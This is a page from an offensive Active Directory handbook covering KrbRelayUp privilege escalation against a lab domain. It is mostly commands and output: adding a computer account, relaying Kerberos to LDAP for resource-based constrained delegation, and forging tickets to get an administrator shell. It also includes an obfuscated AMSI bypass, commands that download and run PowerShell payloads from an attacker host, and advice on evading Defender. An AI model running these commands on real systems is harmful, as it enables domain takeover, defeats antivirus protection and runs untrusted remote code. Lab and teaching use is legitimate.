Attacking Active Directory
  • Reconnaissance
    • Enumerate Network
    • Enumerating Users With CME - Anonymously
    • Enumerate Users Anonymously - RPC
    • Enumerating User with Ldapsearch and enum4linux - Anonymously
    • Enumerate Guest Access on Shares - CME
  • Exploiting With Poison and Relay
    • Responder
    • NTLM relay
    • Secretsdump
    • Lsassy
    • DonPapi
    • Pass The Hash with Winpexec.py
    • Pass The Hash with Evil-Winrm
    • Pass the Hash with CrackMapExec
    • Coerced auth smb + ntlmrelayx to ldaps with drop the mic
  • User Enumeration Exploit
    • setup /etc/hosts and kerberos
    • Exploiting Username - ASREPRoast
    • Password Spraying
    • User listing with GetADUsers and ldapsearch
    • Kerberoasting
    • Powerview
      • Setting Up PowerView
      • Get-NetUser
      • Get-NetGroup
      • Get-NetComputer
      • Get-NetFileServer
      • Get-NetGPO
      • Get-ObjectAcl
      • Get-NetDomainTrust
      • Invoke-Portscan
    • Enumerate Shares with User Account
  • Exploiting with Users
    • SamAccountName (NoPac)
      • Semi Manual Exploit
      • From Linux With NoPAC.py
      • From Windows With noPAC.exe
    • PrintNightmare - Bronx
      • Check and Prepare
      • windows and linux
    • PrintNightmare - Baltimore
      • Exploit
  • WSUS Exploit
  • Active Directory Certificate Services (ADCS)
    • Bloodhound
      • Bloodhound - Install Neo4j
      • Run BloodHound
      • ADCS reconnaissance and enumeration (with certipy and bloodhound)
    • ESC8 - coerce to domain admin
    • ESC8 - with certipy
    • ADCS - ESC1
    • ADCS - ESC2 & ESC3
    • ADCS - ESC4
    • ADCS - ESC6
    • Certifried - CVE-2022–26923
    • Shadow Credentials
  • Metasploit
    • Initial Shell Shell Shell
    • Enumeration 1 - Users, Groups, Computers
    • Enumeration 2 - Arp, Tokens, Patches
    • Enumeration 3 - Shares, SMB, and More
    • Back Door Add User
    • Metasploit Exploit Suggester
    • HashDump With Metasploit
    • Lateral Movement With Metasploit
    • DsSync With Metasploit from NT Autority/System to Administrator
    • Golden Ticket with Metasploit
    • Using a Keylogger with Metasploit
    • BackDoor Meterpreter Service
  • Privilege Escalation
  • User ACL Exploits
    • Hunting with bloodhound
    • ACL With BloodHound
    • ForceChangePassword on User (Donald-> Hugo)
    • GenericWrite on User (Hugo -> Ramon)
    • WriteDacl on User (Ramon-> Nicolas)
    • Add self on Group (Nicolas-> RadioCity)
    • AddMember on Group (RadioCity -> EmpireState)
    • WriteOwner on Group (EmpireState -> CentralPark)
    • Generic all on user (CentralPark -> diego.Montenegro)
      • machine account to administrator shell
      • Silver ticket
    • GPO abuse
    • Read Laps password
  • MSSQL servers Exploitation
    • Enumerate the MSSQL servers
    • Enumerate MSSQL servers with GetUserSPNs & NMAP
    • Enumerate MSSQL servers with CrackMap & Impacket
    • impersonate - execute as login
    • MSSQL Coerce and relay
    • MSSQL trusted links
    • MSSQL Command execution to shell - Yonkers
    • MSSQL Command execution to shell - Salisbury
  • Delegations
    • Unconstrain
    • Constrain Delegation
      • With Protocol Transmition
      • Without protocol transition
    • Resource Based Constrained Delegation
    • Unconstrained delegation Enum
  • Trust
    • Enumerate Trust
    • Domain Trust - child/parent (north.newyork.local -> newyork.local)
      • RaiseMeUp - Escalate with impacket raiseChild
      • Golden ticket + ExtraSid
      • Trust ticket - forge inter-realm TGT
    • Forest Trust (newyork.local -> maryland.local)
      • Foreign group and users
      • Use unconstrained delegation
      • Mssql Trusted link
      • Golden ticket with external forest, sid history ftw ( Maryland-> NewYork)
      • Trust ticket with external forest ( maryland.local-> newyork.local)
      • Exploit acl with external trust golden ticket
  • Exploiting IIS & Privilege escalation
    • IIS - webshell
    • Privesc SeImpersonatePrivilege
    • winPeas without touching disk
    • SeImpersonatePrivilege to Authority\system
    • KrbRelay Up - Linux
    • KrbRelay Up - Windows - PowerPack
    • KrbRelay Up - Windows V2
  • Impacket
    • Install Impacket
    • Getting Initial Shell
Powered by GitBook
On this page
  • Add computer :
  • Get the SID of that computer:
  • Check ports
  • Launch krbrelay
  • Now we finish with RBCD exploitation
  1. Exploiting IIS & Privilege escalation

KrbRelay Up - Linux

PreviousSeImpersonatePrivilege to Authority\systemNextKrbRelay Up - Windows - PowerPack

Last updated 2 years ago

  • Another very useful technic to escalate privileges is kerberos relay, like implemented in KrbRelayUp

  • As KrbRelayUp is detected by defender, we will use the step by step approach like this writeup by @an0n_r0, using @cube0x0 KrbRelay

  • At the time of writing KrbRelay is not detected by defender.

  • The conditions to exploit this privesc is LDAP signing is NOT enforced, we can check that with cme ldap-signing module :

 crackmapexec ldap 192.168.56.10-12 -u elena.lopez -p princesa1 -d north.newyork.local -M ldap-signing

Add computer and RBCD

  • To exploit krbrelay by adding a computer, you must be able to add new Computer, we can check that with cme MAQ module

crackmapexec ldap 192.168.56.11 -u elena.lopez -p princesa1 -d north.newyork.local -M MAQ

Add computer : 

addcomputer.py -computer-name 'krbrelay$' -computer-pass 'ComputerPassword' -dc-host bronx.north.newyork.local -domain-netbios NORTH 'north.newyork.local/pacofish:pacofish'
addcomputer.py -computer-name 'krbrelay$' -computer-pass 'ComputerPassword' -dc-host bronx.north.newyork.local -domain-netbios NORTH 'north.newyork.local/elena.lopez:princesa1'

Get the SID of that computer:

From windows

$o = ([ADSI]"LDAP://CN=krbrelay,CN=Computers,DC=north,DC=newyork,DC=local").objectSID
(New-Object System.Security.Principal.SecurityIdentifier($o.value, 0)).Value
S-1-5-21-3634065772-4036021599-3644360361-1136

From Linux

lookupsid.py  -domain-sids north.newyork.local/elena.lopez:princesa1@192.168.56.10 0
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/PowerView.ps1', 'C:\Users\Elena.Lopez\Documents\PowerView.ps1')

Check ports

xrdp

xfreerdp /u:pacofish /p:pacofish /v:192.168.56.11 /cert-ignore
PS C:\Users\pacofish\Desktop> .\CheckPort.exe
[*] Looking for available ports..
[*] SYSTEM Is allowed through port 443

Launch krbrelay

CLISID: CIeAxiInstallerService Class

https://strontic.github.io/xcyclopedia/library/clsid_90F18417-F0F1-484E-9D3C-59DCEEE5DBD8.html
PS C:\Users\elena.lopez\Desktop> .\KrbRelay.exe -spn ldap/bronx.north.newyork.local -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -rbcd S-1-5-21-3634065772-4036021599-3644360361-1136 -port 443

Now we finish with RBCD exploitation

From Linux Impacket : 

getTGT.py -dc-ip 'bronx.north.newyork.local' 'north.newyork.local'/'krbrelay$':'ComputerPassword'
export KRB5CCNAME=/workspace/krbrelay\$.ccache
getST.py -impersonate 'administrator' -spn 'CIFS/yonkers.north.newyork.local' -k -no-pass -dc-ip 'bronx.north.newyork.local' 'north.newyork.local'/'krbrelay$'
export KRB5CCNAME=/workspace/administrator@CIFS_yonkers.north.newyork.local@NORTH.NEWYORK.LOCAL.ccache
wmiexec.py -k @yonkers.north.newyork.local

C:\>whoami
north\administrator

with Rubeus from Windows

$x=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUt'+'ils');$y=$x.GetField('am'+'siCon'+'text',[Reflection.BindingFlags]'NonPublic,Static');$z=$y.GetValue($null);[Runtime.InteropServices.Marshal]::WriteInt32($z,0x41424344)
iex(new-object system.net.webclient).downloadstring('http://192.168.56.31:8080/amsi_rmouse.txt')
iex(new-object net.webclient).downloadstring('http://192.168.56.31:8080/PowerSharpPack/PowerSharpPack.ps1')
PowerSharpPack -rubeus -Command "hash /password:ComputerPassword"
PowerSharpPack -rubeus -Command "s4u /user:krbrelay$ /rc4:0EDDEDC35EB7B7ECDE0C9F0564E54C83 /impersonateuser:administrator /msdsspn:host/yonkers/ptt"

  • And just like the writeup made by @an0n_r0 we launch SCMUACBypass.exe by Tyranid and get a system shell

Without AV or if you modify/obfuscate KrbRelayUp you can do the all things with the following commands: 

.\KrbRelayUp.exe relay -Domain north.newyork.local -CreateNewComputerAccount -ComputerName evilhost2$ -ComputerPassword pass@123
./KrbRelayUp.exe spawn -m rbcd -d north.newyork.local -dc bronx.north.newyork.local -cn evilhost2$ -cp pass@123

  • KrbRelay can also be used to relay to ADCS or to add msDS-KeyCredentialLink and exploit with ShadowCredentials. All you need to know is on this page, this is leave as an exercice to the reader.

With other methods